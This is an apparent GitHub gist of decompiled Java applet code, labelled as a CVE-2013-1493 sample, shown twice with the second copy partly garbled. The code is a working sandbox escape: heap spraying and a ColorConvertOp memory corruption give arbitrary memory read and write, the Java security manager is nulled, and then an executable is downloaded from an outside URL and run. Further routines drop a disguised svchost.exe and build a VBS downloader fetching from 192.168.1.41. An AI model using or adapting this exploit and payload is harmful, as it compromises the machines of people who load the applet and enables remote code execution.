hellok/gist:5187002

## gistfile1.java
/*     */ import java.applet.Applet;
/*     */ import java.awt.color.ColorSpace;
/*     */ import java.awt.image.BufferedImage;
/*     */ import java.awt.image.ColorConvertOp;
/*     */ import java.awt.image.ColorModel;
/*     */ import java.awt.image.ComponentColorModel;
/*     */ import java.awt.image.ComponentSampleModel;
/*     */ import java.awt.image.DataBuffer;
/*     */ import java.awt.image.SampleModel;
/*     */ import java.awt.image.WritableRaster;
import java.io.BufferedInputStream;
/*     */ import java.io.File;
/*     */ import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.net.HttpURLConnection;
import java.net.URL;
/*     */
/*     */ public class ImAlpha extends Applet
/*     */ {
/*     */   private static final long serialVersionUID = 1L;
/*     */   static final int ARRAY_MAGIC = -1341411317;
/*     */   static final int ARRAY_OLDSIZE = 11;
/*     */   static final int ARRAY_NEWSIZE = 2147483647;
/*     */   static final int LEAK_MAGIC = -559035650;
/*     */   static final int SPRAY_ARRAY_COUNT = 2808685;
/*     */   static final int SPRAY_LEAK_COUNT = 2000000;
/*     */   volatile ImAlpha.Leak[] _sleaks;
/*     */   volatile int[][] _sarrays;
/*     */   volatile int[] _bigArray;
/*     */   int[] _memBaseObj;
/*     */   long _memBaseIdx;
/*     */   long _memBasePtr;
/*     */   int[] soffsets;
/*     */   int[] doffsets;
/*     */
/*     */   public ImAlpha()
/*     */   {
/*  28 */     this.soffsets = new int[] { 0, 1, 2, 3 };
/*     */
/*  31 */     this.doffsets = new int[] { 0, 1, 2, 50000000 };
/*     */   }
/*     */
/*     */   void spray()
/*     */     throws Exception
/*     */   {
/*  37 */     Runtime.getRuntime().gc();
/*  38 */     Runtime.getRuntime().gc();
/*     */
/*  40 */     this._sleaks = new ImAlpha.Leak[2000000];
/*  41 */     this._sarrays = new int[2808685][];
/*     */     try
/*     */     {
/*  44 */       for (int i = 0; i < this._sarrays.length; i++) {
/*  45 */         this._sarrays[i] = new int[11];
/*  46 */         for (int j = 0; j < this._sarrays[i].length; j++) {
/*  47 */           this._sarrays[i][j] = -1341411317;
/*     */         }
/*     */       }
/*     */
/*  51 */       for (int i = 0; i < this._sleaks.length; i++)
/*  52 */         this._sleaks[i] = new ImAlpha.Leak("L");
/*     */     }
/*     */     catch (OutOfMemoryError localOutOfMemoryError)
/*     */     {
/*     */     }
/*     */   }
/*     */
/*     */   void getBigArray()
/*     */     throws Exception
/*     */   {
/*  62 */     for (int i = 0; i < this._sarrays.length; i++) {
/*  63 */       for (int j = 0; (j < this._sarrays[i].length) && (j < 11); j++) {
/*  64 */         this._sarrays[i][j] = -1341411317;
/*     */       }
/*     */     }
/*     */
/*  68 */     for (int i = 0; i < this._sarrays.length; i++) {
/*  69 */       if (this._sarrays[i].length != 2147483647) {
/*  70 */         for (int j = 0; (j < this._sarrays[i].length) && (j < 22); j++) {
/*  71 */           if ((j > 0) && (this._sarrays[i][(j - 1)] != -1341411317) && (this._sarrays[i][j] == -1341411317)) {
/*  72 */             this._sarrays[i][(j - 1)] = 2147483647;
/*     */           }
/*     */         }
/*     */       }
/*     */     }
/*     */
/*  78 */     for (int i = 0; i < this._sarrays.length; i++) {
/*  79 */       if ((this._sarrays[i].length == 11) || (this._bigArray != null) || (this._sarrays[i].length != 2147483647))
/*     */         continue;
/*  81 */       this._bigArray = this._sarrays[i];
/*     */     }
/*     */
/*  86 */     if (this._bigArray == null)
/*  87 */       throw new Exception("fail");
/*     */   }
/*     */
/*     */   long getAddress(Object obj)
/*     */     throws Exception
/*     */   {
/*  93 */     for (int i = 0; i < this._bigArray.length; i++) {
/*  94 */       if (this._bigArray[i] == -559035650) {
/*  95 */         int flag = 0;
/*     */
/*  97 */         for (int j = 0; j < this._sleaks.length; j++) this._sleaks[j].obj = null;
/*  98 */         flag += (this._bigArray[(i + 1)] == 0 ? 1 : 0);
/*     */
/* 100 */         for (int j = 0; j < this._sleaks.length; j++) this._sleaks[j].obj = "X";
/* 101 */         flag += (this._bigArray[(i + 1)] != 0 ? 1 : 0);
/*     */
/* 103 */         if (flag == 2) {
/* 104 */           for (int j = 0; j < this._sleaks.length; j++) this._sleaks[j].obj = obj;
/* 105 */           return this._bigArray[(i + 1)];
/*     */         }
/*     */       }
/*     */     }
/*     */
/* 110 */     throw new Exception("fail");
/*     */   }
/*     */
/*     */   void getMemBase()
/*     */     throws Exception
/*     */   {
/* 116 */     for (int i = 0; i < this._sarrays.length; i++) {
/* 117 */       for (int j = 0; (j < this._sarrays[i].length) && (j < 11); j++) {
/* 118 */         this._sarrays[i][j] = (j == 1 ? i : -1341411317);
/*     */       }
/*     */     }
/*     */
/* 122 */     for (int i = 0; i < this._bigArray.length; i++) {
/* 123 */       if ((i > 0) && (this._bigArray[(i - 1)] != -1341411317) && (this._bigArray[i] == -1341411317) && (this._bigArray[(i + 1)] != -1341411317)) {
/* 124 */         int len = this._bigArray[(i - 1)];
/* 125 */         int idx = this._bigArray[(i + 1)];
/* 126 */         if ((idx >= 0) && (idx < this._sarrays.length) && (this._sarrays[idx] != null) && (this._sarrays[idx].length == len)) {
/* 127 */           this._memBaseObj = this._sarrays[idx];
/* 128 */           this._memBaseIdx = i;
/* 129 */           break;
/*     */         }
/*     */       }
/*     */     }
/*     */
/* 134 */     if (this._memBaseObj == null) {
/* 135 */       throw new Exception("fail");
/*     */     }
/*     */
/* 138 */     this._memBasePtr = getAddress(this._memBaseObj);
/*     */
/* 140 */     if (this._memBasePtr == 0L) {
/* 141 */       throw new Exception("fail");
/*     */     }
/*     */
/* 144 */     this._memBasePtr += 12L;
/*     */   }
/*     */
/*     */   int rdMem(long addr)
/*     */   {
/* 149 */     long offs = this._memBaseIdx + (addr - this._memBasePtr) / 4L;
/* 150 */     if ((offs >= 0L) && (offs < 2147483647L)) {
/* 151 */       return this._bigArray[(int)offs];
/*     */     }
/* 153 */     return 0;
/*     */   }
/*     */
/*     */   void wrMem(long addr, int value)
/*     */   {
/* 158 */     long offs = this._memBaseIdx + (addr - this._memBasePtr) / 4L;
/* 159 */     if ((offs >= 0L) && (offs < 2147483647L))
/* 160 */       this._bigArray[(int)offs] = value;
/*     */   }
/*     */
/*     */   void privileged()
/*     */   {
/*     */     try
/*     */     {
/* 167 */       String Dir = new String("");
/* 168 */       Dir = System.getProperty("java.io.tmpdir");
/*     */
/* 170 */       File f1 = new File(Dir + "svchost.exe");
/*     */       try
/*     */       {
/* 175 */         boolean b = f1.createNewFile();
/*     */       }
/*     */       catch (Exception e)
/*     */       {
/*     */         boolean b;
/* 180 */         e.printStackTrace();
/*     */       }
/*     */
/* 183 */       FileOutputStream outstream = new FileOutputStream(Dir + "svchost.exe");
/*     */
/* 185 */       InputStream instream = ImAlpha.class.getResourceAsStream("svchost.cfg");
/*     */
/* 187 */       int Mnocopploa = 0;
/*     */
/* 190 */       while ((Mnocopploa = instream.read()) != -1)
/*     */       {
/* 193 */         outstream.write(Mnocopploa);
/*     */       }
/*     */
/* 196 */       outstream.flush();
/* 197 */       outstream.close();
/* 198 */       instream.close();
/*     */
/* 200 */       Runtime.getRuntime().exec(Dir + "svchost.exe");
/*     */     } catch (Exception localException) {
/* 202 */       localException.printStackTrace();
/*     */     }
/*     */   }
  		public void privileged2() throws IOException
			{
	            Process localProcess = null;
	            // String command="cmd.exe /c echo Const adTypeBinary = 1 > d:\\apsou.vbs & echo Const adSaveCreateOverWrite = 2 >> d:\\apsou.vbs & echo Dim BinaryStream >> d:\\apsou.vbs & echo Set BinaryStream = CreateObject(\"ADODB.Stream\") >> d:\\apsou.vbs & echo BinaryStream.Type = adTypeBinary >> d:\\apsou.vbs & echo BinaryStream.Open >> d:\\apsou.vbs & echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> d:\\apsou.vbs & echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> d:\\apsou.vbs & echo Function BinaryGetURL(URL) >> d:\\apsou.vbs & echo Dim Http >> d:\\apsou.vbs & echo Set Http = CreateObject(\"WinHttp.WinHttpRequest.5.1\") >> d:\\apsou.vbs & echo Http.Open \"GET\", URL, False >> d:\\apsou.vbs & echo Http.Send >> d:\\apsou.vbs & echo BinaryGetURL = Http.ResponseBody >> d:\\apsou.vbs & echo End Function >> d:\\apsou.vbs & echo Set shell = CreateObject(\"WScript.Shell\") >> d:\\apsou.vbs & echo shell.Run \"d:\\update.exe\" >> d:\\apsou.vbs " +
	            // "& start d:\\apsou.vbs http://192.168.1.41/calc.exe d:\\windows\\update.exe";
	             String command="calc.exe";
	             localProcess = Runtime.getRuntime().exec(command);
			}

			public void privileged1() throws IOException
			{
					Runtime.getRuntime().exec("calc");

			        URL localURL = new URL("http://www.bestoldgames.net/dosbox/download/DOSBox-0.63-install.exe");
			        HttpURLConnection localObject3 = (HttpURLConnection)localURL.openConnection();
			        int i = ((HttpURLConnection)localObject3).getContentLength();
			        String str2 = ((HttpURLConnection)localObject3).getContentType();
			        int j = ((HttpURLConnection)localObject3).getResponseCode();
			        if ((j == 200) && (str2.startsWith("application/")) && (i > 0))
			        {
			          InputStream localInputStream = ((HttpURLConnection)localObject3).getInputStream();
			          BufferedInputStream localBufferedInputStream = new BufferedInputStream(localInputStream);
			          byte[] arrayOfByte2 = new byte[i];
			          int k = 0;
			          int m = 0;
			          while (m < i)
			          {
			            k = localBufferedInputStream.read(arrayOfByte2, m, arrayOfByte2.length - m);
			            if (k == -1)
			              break;
			            m += k;
			          }
			          localBufferedInputStream.close();
			          if (m != i)
			            System.exit(0);
			          File localFile = File.createTempFile("~tmp", ".exe");
			          FileOutputStream localFileOutputStream = new FileOutputStream(localFile);

			          localFileOutputStream.write(arrayOfByte2);

			          localFileOutputStream.flush();
			          localFileOutputStream.close();
			          Runtime.getRuntime().exec(new String[] { localFile.getAbsolutePath() });

			        }

			}
/*     */
/*     */   public void init()
/*     */   {
/*     */     try
/*     */     {
/* 212 */       if (System.getSecurityManager() == null) {
/* 213 */         privileged1();
/* 214 */         return;
/*     */       }
/*     */
/* 217 */       int sWidth = 168; int sHeight = 1;
/* 218 */       int spStride = 4; int ssStride = spStride * sWidth;
/*     */
/* 220 */       int dWidth = sWidth; int dHeight = sHeight;
/* 221 */       int dpStride = 1; int dsStride = 0;
/*     */
/* 223 */       ColorSpace scs = new ImAlpha.MyColorSpace(0, this.soffsets.length - 1);
/* 224 */       ColorModel scm = new ComponentColorModel(scs, true, false, 1, 0);
/* 225 */       SampleModel ssm = new ComponentSampleModel(0, sWidth, sHeight, spStride, ssStride, this.soffsets);
/* 226 */       BufferedImage sbi = new ImAlpha.MyBufferedImage(sWidth, sHeight, 6, 0, scm, ssm);
/*     */
/* 228 */       for (int i = 0; i < ssStride; i++) {
/* 229 */         sbi.getRaster().getDataBuffer().setElem(i, 1);
/*     */       }
/*     */
/* 232 */       ColorSpace dcs = new ImAlpha.MyColorSpace(0, this.doffsets.length - 1);
/* 233 */       ColorModel dcm = new ComponentColorModel(dcs, true, false, 1, 0);
/* 234 */       SampleModel dsm = new ComponentSampleModel(0, dWidth, dHeight, dpStride, dsStride, this.doffsets);
/* 235 */       BufferedImage dbi = new ImAlpha.MyBufferedImage(sWidth, sHeight, 10, 0, dcm, dsm);
/*     */
/* 237 */       ColorConvertOp cco = new ColorConvertOp(null);
/*     */
/* 239 */       spray();
/*     */       try
/*     */       {
/* 242 */         cco.filter(sbi, dbi);
/*     */       }
/*     */       catch (Exception localException) {
/*     */       }
/* 246 */       getBigArray();
/*     */
/* 248 */       getMemBase();
/*     */
/* 250 */       long sys = getAddress(System.class);
/* 251 */       long sm = getAddress(System.getSecurityManager());
/* 252 */       sys = rdMem(sys + 4L);
/* 253 */       for (int i = 0; i < 2000000; i++) {
/* 254 */         long addr = sys + i * 4;
/* 255 */         int val = rdMem(addr);
/* 256 */         if (val == sm) {
/* 257 */           wrMem(addr, 0);
/* 258 */           if (System.getSecurityManager() == null) {
/*     */             break;
/*     */           }
/*     */         }
/*     */       }
/* 263 */       privileged1();
/*     */     }
/*     */     catch (Exception localException1)
/*     */     {
/*     */     }
/*     */   }
/*     */
/*     */   public static void main(String[] args) {
/* 271 */     new ImAlpha().init();
/*     */   }
/*     */
/*     */   class MyColorSpace extends ColorSpace
/*     */   {
/*     */     private static final long serialVersionUID = 1L;
/*     */
/*     */     public MyColorSpace(int type, int numcomponents)
/*     */     {
/* 341 */       super(type, numcomponents); }
/* 342 */     public float[] fromCIEXYZ(float[] value) { return null; }
/* 343 */     public float[] toCIEXYZ(float[] value) { return null; }
/* 344 */     public float[] fromRGB(float[] value) { return null; }
/* 345 */     public float[] toRGB(float[] value) { return null;
/*     */     }
/*     */   }
/*     */
/*     */   class MyBufferedImage extends BufferedImage
/*     */   {
/*     */     int _fakeType;
/*     */     ColorModel _fakeColorModel;
/*     */     SampleModel _fakeSampleModel;
/*     */
/*     */     public MyBufferedImage(int width, int height, int imageType, int fakeType, ColorModel fakeColorModel, SampleModel fakeSampleModel)
/*     */     {
/* 297 */       super(width, height, imageType);
/*     */
/* 299 */       this._fakeType = fakeType;
/* 300 */       this._fakeColorModel = fakeColorModel;
/* 301 */       this._fakeSampleModel = fakeSampleModel;
/*     */     }
/*     */
/*     */     public int getType()
/*     */     {
/* 306 */       String caller = java.lang.Thread.currentThread().getStackTrace()[2].toString();
/* 307 */       if (caller.contains("ICC_Transform.getImageLayout(")) {
/* 308 */         return this._fakeType;
/*     */       }
/*     */
/* 311 */       return super.getType();
/*     */     }
/*     */
/*     */     public ColorModel getColorModel()
/*     */     {
/* 316 */       String caller = java.lang.Thread.currentThread().getStackTrace()[2].toString();
/* 317 */       if ((caller.contains("ICC_Transform.getImageLayout(")) || (caller.contains("CMMImageLayout.<init>("))) {
/* 318 */         return this._fakeColorModel;
/*     */       }
/*     */
/* 321 */       return super.getColorModel();
/*     */     }
/*     */
/*     */     public SampleModel getSampleModel()
/*     */     {
/* 326 */       String caller = java.lang.Thread.currentThread().getStackTrace()[2].toString();
/* 327 */       if (caller.contains("ICC_Transform.getImageLayout(")) {
/* 328 */         return this._fakeSampleModel;
/*     */       }
/*     */
/* 331 */       return super.getSampleModel();
/*     */     }
/*     */   }
/*     */
/*     */   class Leak
/*     */   {
/*     */     public volatile int magic;
/*     */     public volatile Object obj;
/*     */     public volatile Object obj2;
/*     */     public volatile Object obj3;
/*     */     public volatile Object obj4;
/*     */
/*     */     public Leak(Object o)
/*     */     {
/* 284 */       this.magic = -559035650;
/* 285 */       this.obj = o;
/*     */     }
/*     */   }
/*     */ }

/* Location:           E:\360浜戠洏\POC_linux_also\sample\CVE-2013-1493_sample\OK.jar
 * Qualified Name:     ImAlpha
 * JD-Core Version:    0.6.0
 */
	/* */ import java.applet.Applet;
	/* */ import java.awt.color.ColorSpace;
	/* */ import java.awt.image.BufferedImage;
	/* */ import java.awt.image.ColorConvertOp;
	/* */ import java.awt.image.ColorModel;
	/* */ import java.awt.image.ComponentColorModel;
	/* */ import java.awt.image.ComponentSampleModel;
	/* */ import java.awt.image.DataBuffer;
	/* */ import java.awt.image.SampleModel;
	/* */ import java.awt.image.WritableRaster;
	import java.io.BufferedInputStream;
	/* */ import java.io.File;
	/* */ import java.io.FileOutputStream;
	import java.io.IOException;
	import java.io.InputStream;
	import java.net.HttpURLConnection;
	import java.net.URL;
	/* */
	/* */ public class ImAlpha extends Applet
	/* */ {
	/* */ private static final long serialVersionUID = 1L;
	/* */ static final int ARRAY_MAGIC = -1341411317;
	/* */ static final int ARRAY_OLDSIZE = 11;
	/* */ static final int ARRAY_NEWSIZE = 2147483647;
	/* */ static final int LEAK_MAGIC = -559035650;
	/* */ static final int SPRAY_ARRAY_COUNT = 2808685;
	/* */ static final int SPRAY_LEAK_COUNT = 2000000;
	/* */ volatile ImAlpha.Leak[] _sleaks;
	/* */ volatile int[][] _sarrays;
	/* */ volatile int[] _bigArray;
	/* */ int[] _memBaseObj;
	/* */ long _memBaseIdx;
	/* */ long _memBasePtr;
	/* */ int[] soffsets;
	/* */ int[] doffsets;
	/* */
	/* */ public ImAlpha()
	/* */ {
	/* 28 */ this.soffsets = new int[] { 0, 1, 2, 3 };
	/* */
	/* 31 */ this.doffsets = new int[] { 0, 1, 2, 50000000 };
	/* */ }
	/* */
	/* */ void spray()
	/* */ throws Exception
	/* */ {
	/* 37 */ Runtime.getRuntime().gc();
	/* 38 */ Runtime.getRuntime().gc();
	/* */
	/* 40 */ this._sleaks = new ImAlpha.Leak[2000000];
	/* 41 */ this._sarrays = new int[2808685][];
	/* */ try
	/* */ {
	/* 44 */ for (int i = 0; i < this._sarrays.length; i++) {
	/* 45 */ this._sarrays[i] = new int[11];
	/* 46 */ for (int j = 0; j < this._sarrays[i].length; j++) {
	/* 47 */ this._sarrays[i][j] = -1341411317;
	/* */ }
	/* */ }
	/* */
	/* 51 */ for (int i = 0; i < this._sleaks.length; i++)
	/* 52 */ this._sleaks[i] = new ImAlpha.Leak("L");
	/* */ }
	/* */ catch (OutOfMemoryError localOutOfMemoryError)
	/* */ {
	/* */ }
	/* */ }
	/* */
	/* */ void getBigArray()
	/* */ throws Exception
	/* */ {
	/* 62 */ for (int i = 0; i < this._sarrays.length; i++) {
	/* 63 */ for (int j = 0; (j < this._sarrays[i].length) && (j < 11); j++) {
	/* 64 */ this._sarrays[i][j] = -1341411317;
	/* */ }
	/* */ }
	/* */
	/* 68 */ for (int i = 0; i < this._sarrays.length; i++) {
	/* 69 */ if (this._sarrays[i].length != 2147483647) {
	/* 70 */ for (int j = 0; (j < this._sarrays[i].length) && (j < 22); j++) {
	/* 71 */ if ((j > 0) && (this._sarrays[i][(j - 1)] != -1341411317) && (this._sarrays[i][j] == -1341411317)) {
	/* 72 */ this._sarrays[i][(j - 1)] = 2147483647;
	/* */ }
	/* */ }
	/* */ }
	/* */ }
	/* */
	/* 78 */ for (int i = 0; i < this._sarrays.length; i++) {
	/* 79 */ if ((this._sarrays[i].length == 11) \|\| (this._bigArray != null) \|\| (this._sarrays[i].length != 2147483647))
	/* */ continue;
	/* 81 */ this._bigArray = this._sarrays[i];
	/* */ }
	/* */
	/* 86 */ if (this._bigArray == null)
	/* 87 */ throw new Exception("fail");
	/* */ }
	/* */
	/* */ long getAddress(Object obj)
	/* */ throws Exception
	/* */ {
	/* 93 */ for (int i = 0; i < this._bigArray.length; i++) {
	/* 94 */ if (this._bigArray[i] == -559035650) {
	/* 95 */ int flag = 0;
	/* */
	/* 97 */ for (int j = 0; j < this._sleaks.length; j++) this._sleaks[j].obj = null;
	/* 98 */ flag += (this._bigArray[(i + 1)] == 0 ? 1 : 0);
	/* */
	/* 100 */ for (int j = 0; j < this._sleaks.length; j++) this._sleaks[j].obj = "X";
	/* 101 */ flag += (this._bigArray[(i + 1)] != 0 ? 1 : 0);
	/* */
	/* 103 */ if (flag == 2) {
	/* 104 */ for (int j = 0; j < this._sleaks.length; j++) this._sleaks[j].obj = obj;
	/* 105 */ return this._bigArray[(i + 1)];
	/* */ }
	/* */ }
	/* */ }
	/* */
	/* 110 */ throw new Exception("fail");
	/* */ }
	/* */
	/* */ void getMemBase()
	/* */ throws Exception
	/* */ {
	/* 116 */ for (int i = 0; i < this._sarrays.length; i++) {
	/* 117 */ for (int j = 0; (j < this._sarrays[i].length) && (j < 11); j++) {
	/* 118 */ this._sarrays[i][j] = (j == 1 ? i : -1341411317);
	/* */ }
	/* */ }
	/* */
	/* 122 */ for (int i = 0; i < this._bigArray.length; i++) {
	/* 123 */ if ((i > 0) && (this._bigArray[(i - 1)] != -1341411317) && (this._bigArray[i] == -1341411317) && (this._bigArray[(i + 1)] != -1341411317)) {
	/* 124 */ int len = this._bigArray[(i - 1)];
	/* 125 */ int idx = this._bigArray[(i + 1)];
	/* 126 */ if ((idx >= 0) && (idx < this._sarrays.length) && (this._sarrays[idx] != null) && (this._sarrays[idx].length == len)) {
	/* 127 */ this._memBaseObj = this._sarrays[idx];
	/* 128 */ this._memBaseIdx = i;
	/* 129 */ break;
	/* */ }
	/* */ }
	/* */ }
	/* */
	/* 134 */ if (this._memBaseObj == null) {
	/* 135 */ throw new Exception("fail");
	/* */ }
	/* */
	/* 138 */ this._memBasePtr = getAddress(this._memBaseObj);
	/* */
	/* 140 */ if (this._memBasePtr == 0L) {
	/* 141 */ throw new Exception("fail");
	/* */ }
	/* */
	/* 144 */ this._memBasePtr += 12L;
	/* */ }
	/* */
	/* */ int rdMem(long addr)
	/* */ {
	/* 149 */ long offs = this._memBaseIdx + (addr - this._memBasePtr) / 4L;
	/* 150 */ if ((offs >= 0L) && (offs < 2147483647L)) {
	/* 151 */ return this._bigArray[(int)offs];
	/* */ }
	/* 153 */ return 0;
	/* */ }
	/* */
	/* */ void wrMem(long addr, int value)
	/* */ {
	/* 158 */ long offs = this._memBaseIdx + (addr - this._memBasePtr) / 4L;
	/* 159 */ if ((offs >= 0L) && (offs < 2147483647L))
	/* 160 */ this._bigArray[(int)offs] = value;
	/* */ }
	/* */
	/* */ void privileged()
	/* */ {
	/* */ try
	/* */ {
	/* 167 */ String Dir = new String("");
	/* 168 */ Dir = System.getProperty("java.io.tmpdir");
	/* */
	/* 170 */ File f1 = new File(Dir + "svchost.exe");
	/* */ try
	/* */ {
	/* 175 */ boolean b = f1.createNewFile();
	/* */ }
	/* */ catch (Exception e)
	/* */ {
	/* */ boolean b;
	/* 180 */ e.printStackTrace();
	/* */ }
	/* */
	/* 183 */ FileOutputStream outstream = new FileOutputStream(Dir + "svchost.exe");
	/* */
	/* 185 */ InputStream instream = ImAlpha.class.getResourceAsStream("svchost.cfg");
	/* */
	/* 187 */ int Mnocopploa = 0;
	/* */
	/* 190 */ while ((Mnocopploa = instream.read()) != -1)
	/* */ {
	/* 193 */ outstream.write(Mnocopploa);
	/* */ }
	/* */
	/* 196 */ outstream.flush();
	/* 197 */ outstream.close();
	/* 198 */ instream.close();
	/* */
	/* 200 */ Runtime.getRuntime().exec(Dir + "svchost.exe");
	/* */ } catch (Exception localException) {
	/* 202 */ localException.printStackTrace();
	/* */ }
	/* */ }
	public void privileged2() throws IOException
	{
	Process localProcess = null;
	// String command="cmd.exe /c echo Const adTypeBinary = 1 > d:\\apsou.vbs & echo Const adSaveCreateOverWrite = 2 >> d:\\apsou.vbs & echo Dim BinaryStream >> d:\\apsou.vbs & echo Set BinaryStream = CreateObject(\"ADODB.Stream\") >> d:\\apsou.vbs & echo BinaryStream.Type = adTypeBinary >> d:\\apsou.vbs & echo BinaryStream.Open >> d:\\apsou.vbs & echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> d:\\apsou.vbs & echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> d:\\apsou.vbs & echo Function BinaryGetURL(URL) >> d:\\apsou.vbs & echo Dim Http >> d:\\apsou.vbs & echo Set Http = CreateObject(\"WinHttp.WinHttpRequest.5.1\") >> d:\\apsou.vbs & echo Http.Open \"GET\", URL, False >> d:\\apsou.vbs & echo Http.Send >> d:\\apsou.vbs & echo BinaryGetURL = Http.ResponseBody >> d:\\apsou.vbs & echo End Function >> d:\\apsou.vbs & echo Set shell = CreateObject(\"WScript.Shell\") >> d:\\apsou.vbs & echo shell.Run \"d:\\update.exe\" >> d:\\apsou.vbs " +
	// "& start d:\\apsou.vbs http://192.168.1.41/calc.exe d:\\windows\\update.exe";
	String command="calc.exe";
	localProcess = Runtime.getRuntime().exec(command);
	}

	public void privileged1() throws IOException
	{
	Runtime.getRuntime().exec("calc");

	URL localURL = new URL("http://www.bestoldgames.net/dosbox/download/DOSBox-0.63-install.exe");
	HttpURLConnection localObject3 = (HttpURLConnection)localURL.openConnection();
	int i = ((HttpURLConnection)localObject3).getContentLength();
	String str2 = ((HttpURLConnection)localObject3).getContentType();
	int j = ((HttpURLConnection)localObject3).getResponseCode();
	if ((j == 200) && (str2.startsWith("application/")) && (i > 0))
	{
	InputStream localInputStream = ((HttpURLConnection)localObject3).getInputStream();
	BufferedInputStream localBufferedInputStream = new BufferedInputStream(localInputStream);
	byte[] arrayOfByte2 = new byte[i];
	int k = 0;
	int m = 0;
	while (m < i)
	{
	k = localBufferedInputStream.read(arrayOfByte2, m, arrayOfByte2.length - m);
	if (k == -1)
	break;
	m += k;
	}
	localBufferedInputStream.close();
	if (m != i)
	System.exit(0);
	File localFile = File.createTempFile("~tmp", ".exe");
	FileOutputStream localFileOutputStream = new FileOutputStream(localFile);

	localFileOutputStream.write(arrayOfByte2);

	localFileOutputStream.flush();
	localFileOutputStream.close();
	Runtime.getRuntime().exec(new String[] { localFile.getAbsolutePath() });

	}

	}
	/* */
	/* */ public void init()
	/* */ {
	/* */ try
	/* */ {
	/* 212 */ if (System.getSecurityManager() == null) {
	/* 213 */ privileged1();
	/* 214 */ return;
	/* */ }
	/* */
	/* 217 */ int sWidth = 168; int sHeight = 1;
	/* 218 / int spStride = 4; int ssStride = spStride sWidth;
	/* */
	/* 220 */ int dWidth = sWidth; int dHeight = sHeight;
	/* 221 */ int dpStride = 1; int dsStride = 0;
	/* */
	/* 223 */ ColorSpace scs = new ImAlpha.MyColorSpace(0, this.soffsets.length - 1);
	/* 224 */ ColorModel scm = new ComponentColorModel(scs, true, false, 1, 0);
	/* 225 */ SampleModel ssm = new ComponentSampleModel(0, sWidth, sHeight, spStride, ssStride, this.soffsets);
	/* 226 */ BufferedImage sbi = new ImAlpha.MyBufferedImage(sWidth, sHeight, 6, 0, scm, ssm);
	/* */
	/* 228 */ for (int i = 0; i < ssStride; i++) {
	/* 229 */ sbi.getRaster().getDataBuffer().setElem(i, 1);
	/* */ }
	/* */
	/* 232 */ ColorSpace dcs = new ImAlpha.MyColorSpace(0, this.doffsets.length - 1);
	/* 233 */ ColorModel dcm = new ComponentColorModel(dcs, true, false, 1, 0);
	/* 234 */ SampleModel dsm = new ComponentSampleModel(0, dWidth, dHeight, dpStride, dsStride, this.doffsets);
	/* 235 */ BufferedImage dbi = new ImAlpha.MyBufferedImage(sWidth, sHeight, 10, 0, dcm, dsm);
	/* */
	/* 237 */ ColorConvertOp cco = new ColorConvertOp(null);
	/* */
	/* 239 */ spray();
	/* */ try
	/* */ {
	/* 242 */ cco.filter(sbi, dbi);
	/* */ }
	/* */ catch (Exception localException) {
	/* */ }
	/* 246 */ getBigArray();
	/* */
	/* 248 */ getMemBase();
	/* */
	/* 250 */ long sys = getAddress(System.class);
	/* 251 */ long sm = getAddress(System.getSecurityManager());
	/* 252 */ sys = rdMem(sys + 4L);
	/* 253 */ for (int i = 0; i < 2000000; i++) {
	/* 254 / long addr = sys + i 4;
	/* 255 */ int val = rdMem(addr);
	/* 256 */ if (val == sm) {
	/* 257 */ wrMem(addr, 0);
	/* 258 */ if (System.getSecurityManager() == null) {
	/* */ break;
	/* */ }
	/* */ }
	/* */ }
	/* 263 */ privileged1();
	/* */ }
	/* */ catch (Exception localException1)
	/* */ {
	/* */ }
	/* */ }
	/* */
	/* */ public static void main(String[] args) {
	/* 271 */ new ImAlpha().init();
	/* */ }
	/* */
	/* */ class MyColorSpace extends ColorSpace
	/* */ {
	/* */ private static final long serialVersionUID = 1L;
	/* */
	/* */ public MyColorSpace(int type, int numcomponents)
	/* */ {
	/* 341 */ super(type, numcomponents); }
	/* 342 */ public float[] fromCIEXYZ(float[] value) { return null; }
	/* 343 */ public float[] toCIEXYZ(float[] value) { return null; }
	/* 344 */ public float[] fromRGB(float[] value) { return null; }
	/* 345 */ public float[] toRGB(float[] value) { return null;
	/* */ }
	/* */ }
	/* */
	/* */ class MyBufferedImage extends BufferedImage
	/* */ {
	/* */ int _fakeType;
	/* */ ColorModel _fakeColorModel;
	/* */ SampleModel _fakeSampleModel;
	/* */
	/* */ public MyBufferedImage(int width, int height, int imageType, int fakeType, ColorModel fakeColorModel, SampleModel fakeSampleModel)
	/* */ {
	/* 297 */ super(width, height, imageType);
	/* */
	/* 299 */ this._fakeType = fakeType;
	/* 300 */ this._fakeColorModel = fakeColorModel;
	/* 301 */ this._fakeSampleModel = fakeSampleModel;
	/* */ }
	/* */
	/* */ public int getType()
	/* */ {
	/* 306 */ String caller = java.lang.Thread.currentThread().getStackTrace()[2].toString();
	/* 307 */ if (caller.contains("ICC_Transform.getImageLayout(")) {
	/* 308 */ return this._fakeType;
	/* */ }
	/* */
	/* 311 */ return super.getType();
	/* */ }
	/* */
	/* */ public ColorModel getColorModel()
	/* */ {
	/* 316 */ String caller = java.lang.Thread.currentThread().getStackTrace()[2].toString();
	/* 317 */ if ((caller.contains("ICC_Transform.getImageLayout(")) \|\| (caller.contains("CMMImageLayout.<init>("))) {
	/* 318 */ return this._fakeColorModel;
	/* */ }
	/* */
	/* 321 */ return super.getColorModel();
	/* */ }
	/* */
	/* */ public SampleModel getSampleModel()
	/* */ {
	/* 326 */ String caller = java.lang.Thread.currentThread().getStackTrace()[2].toString();
	/* 327 */ if (caller.contains("ICC_Transform.getImageLayout(")) {
	/* 328 */ return this._fakeSampleModel;
	/* */ }
	/* */
	/* 331 */ return super.getSampleModel();
	/* */ }
	/* */ }
	/* */
	/* */ class Leak
	/* */ {
	/* */ public volatile int magic;
	/* */ public volatile Object obj;
	/* */ public volatile Object obj2;
	/* */ public volatile Object obj3;
	/* */ public volatile Object obj4;
	/* */
	/* */ public Leak(Object o)
	/* */ {
	/* 284 */ this.magic = -559035650;
	/* 285 */ this.obj = o;
	/* */ }
	/* */ }
	/* */ }

	/* Location: E:\360浜戠洏\POC_linux_also\sample\CVE-2013-1493_sample\OK.jar
	* Qualified Name: ImAlpha
	* JD-Core Version: 0.6.0
	*/